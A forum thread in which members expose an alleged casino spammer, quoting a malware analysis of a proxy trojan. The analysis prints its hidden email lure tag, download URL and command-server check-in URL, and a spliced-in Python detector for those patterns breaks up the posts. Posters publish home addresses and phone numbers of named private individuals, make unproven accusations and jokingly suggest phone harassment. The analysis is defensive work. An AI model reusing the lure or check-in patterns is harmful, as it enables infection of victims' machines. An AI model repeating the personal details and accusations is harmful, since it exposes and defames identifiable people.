Evil spammer

dominique

Dormant account
I am not quite sure if this thread belongs here. I am sure it can be moved.

This guy is a big time spammer.

Someone at a webmaster board exposed him and he read it.

Next thing he bombs the person who complained with bounced spam - tons of it. He used their address as the sender and sent out his spam and they got all the bounces.

Now here is some more info on this person, and it makes your hair stand on end. I am likely going to be targeted for publishing this, but I will not have someone like that intimidate everyone.

He is also linked to deploying trojans.


Jeroen Puttemans
+32.23057068
Platanenlaan 15, Perk, BRABANT 1820
BELGIUM

And if in any doubt have a look at this project on Scriptlance for a mailer with proxy support (we all know what they are used for, don't we?):


That or something like it is what he uses.

He apparently owns this:

Address: Platanenlaan 15, 1820, Perk Belgium Europe
Office: +32 477 99-4283
Fax:
Email: support@casinowebmarketing.com
ICQ: 123226511



Type: Trojan (lures you to a website to be infected by a trojan)
Domain(s)/IP Address(es) used: hotwincasino.com (WHOIS) (DNS)
Exact Link: http://www.hotwincasino.com/page.php
Email's Originating Network(s): Sjrb.ca (Canadian Network)
Danger Level: Medium

Description

Yes another spammed out trojan but this time somewhat different to the most recent ones, mostly in that it does not appear to be a keylogger at all. We received an email early this morning with the subject of:

YOU WON A FREE VACATION

The email also appeared to have no body. It was simply an empty email that scrolled for a fair way. Being suspicious of this we had a peek at the source of the email. We were not too terribly surprised to find that even though the email displayed nothing in the body there was a line, right down the bottom, that read:

object data="xhttp://www.hotwincasino.com/page.php" width="14" height="14"

As we've mentioned many times before, the OBJECT tag is a method of embedding other content into a HTML page. In this case it fetches and tries to open:

xhttp://www.hotwincasino.com/page.php

We fetched a copy of this page to investigate further. Again we were not surprised to find the page was a HTA (HTML Application), which is basically a very powerful way of allowing web pages to interact with Windows systems. At present we don't have a full idea of how this one works. We know that it calls the file:

xhttp://www.hotwincasino.com/mstasks.exe

in order to do something with it, but this time the spammers have been clever and used an encoding function of VBScript to make the code unreadable to humans. Being non-programmers ourselves we are unsure how to go about decoding this script. If there are any VBScript people out there who would like to give the code a look over (remember it is viral so be careful) there is a copy in the zip file below.

We downloaded the mstasks.exe file from the site (not to be confused with the Windows file mstask.exe) and ran strings across it in order to extract any plain text that might give us some clues. This first pass was not very successful and we only ended up with some information that confirmed that it appeared to hook into various components of Windows networking.

In order to find out more, we once again set up our VMware (virtual machine) with a victim Windows 2000 operating system. Internal monitoring was set up using the free utilities from Sysinternals, who make some very good tools, highly recommended for forensics work on Windows machines. External network monitoring was set up on our Linux gateway.

Once this was set up we loaded up the page the email used and sat back to watch what happened. Well the good news is that the initial infection phase doesn't appear to work too well. Our Windows 2000 set up is totally unpatched but Internet Explorer did actually ask us if we wanted to save or execute the code being sucked down. This should tip most people off to something being wrong and cancelling the transaction. However since we don't have other systems to test, perhaps other versions of Windows do execute the code without asking.

Either way, once the code is executed a small blank window pops up. Nothing inside it. However in the background there is some serious work happening. From what we can tell the contents of mstasks.exe are downloaded and then executed on the machine. This creates a number of files. We found that in the C:\ directory there were two new executable files:

y.exe
x.exe

We also found that in the C:\WINNT\system32\ directory there was a file called:

scchost.exe

Notice again how the spammers have tried to make the file name similar to a real Windows file in the same directory (svchost.exe). We found that this file was now also running as a full time process in the background. After about 30 seconds another executable was created in the same directory, this time called:

scchostc.exe

This was also started as a full time process (as a child of scchost.exe) and began to listen on a port. Later on we found that this port was chosen at random each time the trojan started up. For example, some of the ports we saw being used:

40627
12052
36890

After this point the trojan appeared to simply sit there and await instructions. After probing the open port for a bit we came to the conclusion that it was a proxy server. At around this time we also noticed some network traffic from the machine. First there was a call from the machine to the site:

http://www.ip2location.com/map.asp

Which is a legitimate web site that simply reports back where your request is coming from and if you are behind a proxy server. This is used by the trojan to obtain the machine's real IP address for the next phase.

The next phase is then to send a request that says:

xhttp://216.52.184.239/command.php?IP=<victim's IP address>&Port=<port number proxy is listening on>

Once this is done the remote server starts sending back a steady stream of what look like web site fetch requests. However since we're not super savvy with these we are unable to tell completely.

Basically what we have here is a clever little proxy trojan that the spammers could easily use for a number of things: making anonymous web requests, sending out spam, attacking other machines on the internet, and the fact it reports back to base to keep the spammers up to date is quite handy for them as they don't have to bother probing to see which machines are infected.

Having watched the infection in action we then decided to turn our attention back to the executable files. After some more probing we found that several of the files had been packed with UPX and that was why we were getting very little information out of them. We ran the UPX unpacker across the following files:

mstasks.exe
scchostc.exe
y.exe

The other files we found not to be packed with UPX. Once all the files were unpacked we ran strings across them and came out with some interesting results:



mstasks.exe - The initial infection file. Creates scchost.exe and scchostc.exe. Also adds registry entries to ensure the trojan starts at boot time. Also seems to contain the packed components of the other files.

x.exe - Seems to be a left over from the trojan install. Seems to just download mstasks.exe and save it to y.exe.

y.exe - A duplicate of mstasks.exe.

scchost.exe - Trojan start up file. Sets up the trojan environment, initialises scchostc.exe and finds out the victim machine's IP address using the above stated method.

scchostc.exe - The proxy part of the trojan. Turns out to be a copy of a legitimate proxy software known as 3Proxy. It appears trojan writers have used this before as many anti-virus scanners detect it as Backdoor.Daemonize.


It is important to note this is not a worm or a virus. It is not self propagating. It was purposefully sent out by the spammers, as a bulk email, in order to get people infected with this trojan.

Now we knew what the trojan did, we turned back to where the trojan came from. We had a look at the top level for the site and found that it was nothing more than an empty place holder. We also found the files are being hosted on Yahoo! servers. We will contact Yahoo! shortly and inform them of this breach of the AUP and hopefully get the viral files quickly pulled down. We also found that where the trojan is reporting back to appears to be linked with this domain:

playthehouse.com - (WHOIS) (DNS)

This link is strengthened, for when we check the apparent registrants for both domains we find the same person:

Jeroen Puttemans

It appears that he is heavily involved with online casinos and, given what we are seeing today, is not above stooping to using trojaned machines to do some dirty work for him.

Extra Information

Copy of the email - Due to the fact that Internet Explorer has a habit of trying to execute HTML code even when a file is marked as plain text, we will not be placing a copy of the email here until the sites are confirmed to have been taken down. A copy of the email will be in the zip file.

Strings of mstasks.exe - Before unpacking

Strings of mstasks.exe - After unpacking

Strings of x.exe - No unpacking needed

Strings of y.exe - Before unpacking

Strings of y.exe - After unpacking

Strings of scchost.exe - No unpacking needed

Strings of scchostc.exe - Before unpacking

Strings of scchostc.exe - After unpacking

Screen shot of Internet Explorer prompting to execute or download the trojan

Screen shot of the window that pops up if the user chooses to execute it

Screen shot showing scchost.exe running in the background

Screen shot showing the presence of x.exe and y.exe

Screen shot showing scchostc.exe being started as a child of scchost.exe

Screen shot showing scchostc.exe listening on a random port - In this case port 12052

WARNING

Some of the files contained in the following zip file are viral in nature. As such we only recommend those who know what they are doing download the file. Code Fish Spam Watch will not take responsibility if this warning is ignored and your machine is infected.

Copy of trojan site and other details - Contained within a passworded zip file. Password "trojan" but without quotes.

Log of further activity

7:15 9/3/04 - Domain still fully active. Going to try and find another way to contact Yahoo!

And more:

And he sells credit card info:

And it gets worse....what a lowlife scumbag!



WARNING

If you have been sent to this website by a person calling himself 'godmailer', or using the following contact details, you are being ripped off. The product functionality that he describes is inaccurate and not included in our releases.

Jeroen Puttemans (webmaster@turnkeycasino.net)
+32.23057068
Platanenlaan 15
Perk, Brabant 1820
BE

Martin Puttemans (webmaster@turnkeycasino.net)
+32.477994283
Vinkreed 4
Osmod, BRABANT 1820
BE

ICQ: 123226511

He is offering to sell our product for between $300 and $500 USD. We have determined that he has obtained an early version of our product (REL-0.6) which is severely outdated and functionally incomplete. We have complete logs of his intrusion attempts over the past 2 months and authorities have been contacted.

We have removed all product information and documentation in the interim.

If you have already purchased a copy of our software from the above mentioned person please contact us at sales@cleanmailer.com, all information will be treated in the strictest of confidence.

I hope someone will tell him to cut it out. If you speak up against him he goes after you. I don't think someone like that should be allowed to intimidate an entire section of the industry!
 
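The infection chain quoted above has two pieces a mail gateway or proxy log review can key on: an HTML e-mail whose visible body is empty but carries a tiny `<object data="http://...">` tag pulling a page from a remote host, and a later check-in of the shape `command.php?IP=<address>&Port=<n>` after the machine looks up its own public address. The following is an added defender-side example, not code from this thread or from Code Fish Spam Watch. The e-mail bodies, the log format (time, client, method, URL) and the hosts `lure.example`, `cdn.example` and `198.51.100.7` are constructed for the example; `www.ip2location.com` is the lookup site named in the write-up and only appears as context in the sample log.

```python
"""Defender-side checks for the infection chain described in the write-up.
Added example, not code from the thread or from Code Fish Spam Watch.
Sample e-mail bodies, log lines, hostnames and addresses are constructed."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse


class ObjectTagFinder(HTMLParser):
    """Collect <object> tags whose data attribute points at a remote host,
    and count the visible text so an 'empty' body can be recognised."""

    def __init__(self):
        super().__init__()
        self.hits = []
        self.text_chars = 0

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        a = dict(attrs)
        url = a.get("data") or ""
        parsed = urlparse(url)
        if parsed.scheme in ("http", "https") and parsed.netloc:
            self.hits.append({"url": url, "width": a.get("width"), "height": a.get("height")})

    def handle_data(self, data):
        self.text_chars += len(data.strip())


def suspicious_objects(html, max_dim=32):
    """Return the URLs of remote <object> tags that are either tiny
    (the 14x14 box in the write-up) or sit in a body with no visible text.
    A normally sized embed in a real newsletter is not reported."""
    finder = ObjectTagFinder()
    finder.feed(html)
    flagged = []
    for hit in finder.hits:
        try:
            width = int(hit["width"] or 0)
            height = int(hit["height"] or 0)
        except ValueError:          # e.g. width="100%": treat as not tiny
            width = height = max_dim + 1
        tiny = width <= max_dim and height <= max_dim
        if tiny or finder.text_chars == 0:
            flagged.append(hit["url"])
    return flagged


def beacon_checkins(log_lines):
    """Scan proxy log lines (constructed format: time client method url)
    for the check-in shape command.php?IP=<addr>&Port=<n>.
    Parameter names are matched case-insensitively; the port must be valid.
    Returns (client, reported_ip, port) tuples."""
    found = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        parsed = urlparse(url)
        if not parsed.path.lower().endswith("/command.php"):
            continue
        query = {k.lower(): v[0] for k, v in parse_qs(parsed.query).items()}
        port = query.get("port", "")
        if "ip" in query and port.isdigit() and 1 <= int(port) <= 65535:
            found.append((client, query["ip"], int(port)))
    return found


# Constructed e-mail body in the shape the write-up describes: no visible
# text, one 14x14 <object> pulling a page from a remote host.
SPAM_HTML = """<html><body>
<object data="http://lure.example/page.php" width="14" height="14"></object>
</body></html>"""

# Constructed benign newsletter: real text and a normally sized embed.
NEWSLETTER_HTML = """<html><body><p>This month's update is below.</p>
<object data="http://cdn.example/update.swf" width="400" height="300"></object>
</body></html>"""

# Constructed proxy log: the public-address lookup, the check-in, and an
# unrelated command.php request that carries no IP/Port parameters.
PROXY_LOG = """\
2004-09-03T07:10:01 10.0.0.5 GET http://www.ip2location.com/map.asp
2004-09-03T07:10:03 10.0.0.5 GET http://198.51.100.7/command.php?IP=203.0.113.9&Port=40627
2004-09-03T07:11:00 10.0.0.8 GET http://www.example.com/command.php?page=1
""".splitlines()

if __name__ == "__main__":
    print("hidden remote objects:", suspicious_objects(SPAM_HTML))
    print("benign newsletter:", suspicious_objects(NEWSLETTER_HTML))
    print("check-ins:", beacon_checkins(PROXY_LOG))
```

The e-mail check deliberately reports on either signal (tiny dimensions or an empty body), since a mailer can trivially change the box size; the log check requires both the `command.php` path and a well-formed `IP`/`Port` pair so that ordinary pages that happen to be called `command.php` are not reported.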

deaning

Dormant account
Ellen and I are the targets.


Ellen and I have been targeted by a spammer since she placed a complaint with Wager Share about repeated spam from an apparent affiliate after many months of trying to unsubscribe. After a post at CAP about it (he obviously reads the posts there) she received over 22k of bounced emails with her as the sender and reply address.

Not being too bright about it, with some help we found out who he is. I then became a target with these 2 emails being sent out to who knows how many people with myself as the sender and reply to addy:

Subject: CLICK YES TO WIN A NEW CAR!!

I would hope you'll stop this jerk <http://www.pokerpokerandmorepoker.com> ,
makes online gambling look so bad



if I was a player I would NEVER play here
<http://www.pokerpokerandmorepoker.com>

Just in:

Subject: I'm a crook. Read about me on my site

I would hope you'll stop me <http://www.pokerpokerandmorepoker.com> , making
online gambling looking so bad
Me and my husband, Dean, are most stupid people in the online casino
marketing.


We just idiots!

I have since discovered the perpetrator has:
Installed trojans from a website to people lured there
Stolen beta mailing software from a company and resold it

I phoned the prat yesterday and it appears he is not prepared to desist.

Well, I am not easily intimidated. You picked the wrong guy. You will be exposed as the garbage you are.


Jeroen Puttemans was installing trojans via xwww.hotwincasino.com.


Has sold or attempted to sell player and credit card details at CAP, Startcasino and WOL that I know of.


We're exclusive broker for 12 online casinos that sell their properties.
Each casino has about 2,700 real player accounts and they offer
for sale their email addresses.

Contact us on our email market2casino@yahoo.com

Who comes first gets a priority.
Stole beta mailing software and was reselling at inflated prices.



WARNING

If you have been sent to this website by a person calling himself 'godmailer', or using the following contact details, you are being ripped off. The product functionality that he describes is inaccurate and not included in our releases.

Jeroen Puttemans (webmaster@turnkeycasino.net)
+32.23057068
Platanenlaan 15
Perk, Brabant 1820
BE

Martin Puttemans (webmaster@turnkeycasino.net)
+32.477994283
Vinkreed 4
Osmod, BRABANT 1820
BE

ICQ: 123226511

He is offering to sell our product for between $300 and $500 USD. We have determined that he has obtained an early version of our product (REL-0.6) which is severely outdated and functionally incomplete. We have complete logs of his intrusion attempts over the past 2 months and authorities have been contacted.

We have removed all product information and documentation in the interim.

If you have already purchased a copy of our software from the above mentioned person please contact us at sales@cleanmailer.com, all information will be treated in the strictest of confidence.

He also owns:
playthehouse.com (since closed)
hotwincasino.com (yahoo has removed)
turnkeycasino.net
casinowebmarketing.com (rents out spam lists)
market2casino@yahoo.com (used to sell player information)

Consistent spam is sent by him as Casino Bonus and the unsubscribe links are duds.

project on Scriptlance for a mailer with proxy support (we all know what they are used for, don't we?):



Made the following post at 7seascasino.com:

Almost all "players" (I mean casino vendors, forum owners, gambling portals webmasters) in this industry are crooks and thieves. I don't believe you'll ever see even one dime from Futurebet or whatever they call themselves. You waste your time by informing people how bad futurebet is. You only help Marc Lesnik (the biggest crook out there) to

gain more money from futurebet for removing your posting from his crooked forum. The same is true for crooks from winneronline, etc. Trust this helps you.
Michael <market2casino@yahoo.com>
USA - Sunday, May 04, 2003 at 15:18:44 (PDT)
Also a quick search at google:
 

jpm

Dormant account
Dominique, you should remove or at least break up that hotwincasino URL in your message. If anyone clicks on it and doesn't have the kind of virtual armor I have on my computer, they will be infected instantly.

DON'T CLICK ON THE HOTWINCASINO LINKS IN THIS THREAD, YOUR MACHINE WILL BE INFECTED!
 

jetset

RIP Brian
CAG
Good advice, JPM.

This guy was a frequent spam poster at WOL a couple years back - he has clearly *progressed* since then. Are there any European authorities who might be interested in his behaviour?
 

Casinomeister

Forum Cheermeister
Staff member
This Jeroen Puttemans is the dick breath who "joe jobbed" me and the Professor last November. This was after I published an article in my newsletter that tied this a-hole in with 1CNP.
http://www.casinomeister.com/newsletter/2003/6nov2003.html#1cnp

I believe he has a very small penis. This is why he uses the Internet to give himself a feigned sense of power. He is a malicious little baby.
 

Casinomeister

Forum Cheermeister
Staff member
And hi Deaning!

Welcome back!
 

jetset

RIP Brian
CAG
Looking at the history of this creep Puttemans I would suggest he should learn to spell "I N T E R P O L" - soon.

Edit - typos
 

dominique

Dormant account
jpm said:
Dominique, you should remove or at least break up that hotwincasino URL in your message. If anyone clicks on it and doesn't have the kind of virtual armor I have on my computer, they will be infected instantly.

DON'T CLICK ON THE HOTWINCASINO LINKS IN THIS THREAD, YOUR MACHINE WILL BE INFECTED!

I would love to disable them, but I think I am too late to edit - I can't do it.

Maybe the Meister can do it. Thanks and sorry.

Also, if this is the guy from 1cnp, then the credit card details he is selling are those of 1cnp players. Probably their addresses is what he also sells at his site.
 

deaning

Dormant account
1cnp? Geez.

Time to wake up the dopey *&^& person again..
3223057068 belgium

He doesn't know what I am talking about.

Silly, silly person.

I called and was told if I want to unsubscribe to click the unsubscribe link on the email.

He then hung up. I called again.

I then told him I was the Dean Ing he was targeting.

He hung up again.

The phone goes unanswered...

Well, if you have ever been spammed and want to talk to a real live example...give old Jeroen a call!
 

jpm

Dormant account
I think that if I were getting spammed by this dickless wonder, I would set my modem to dial him up at all times of the day and night until he is forced to change his number. If I were malicious that is ;-)
 

deaning

Dormant account
Hiya Meister!

The hotwin site is no longer active...yahoo has taken it down, but still don't go there and if you have, run ad aware just to be safe.

Well he ain't going to give up and has had fair warning. I will utilise every means at my disposal (legal).

Today he has emailed all the aff programs and a lot of webmasters.

Now, this also is supposedly from Ellen to all the people that MAY have done business with his shonky casinowebmarketing site. That's not too bright is it?

I don't really have to do much at all, he is doing himself in admirably! :):):)

Glad I have cheap international rates. :)
 

dominique

Dormant account
There are more attacks on Dean and Ellen - I am sure some of you have received those mails. They appear to come from Dean and Ellen but are his.

All of you who got this mail - you are on this guys spam list.

Currently he is attacking a second person - a good friend of yours, Brian!

This has to stop. Grrrrrrr
 

deaning

Dormant account
Yes, it appears he has decided to send to all 12 million names he claims to have...

Well, I won't rest until he has not 1 account left.
 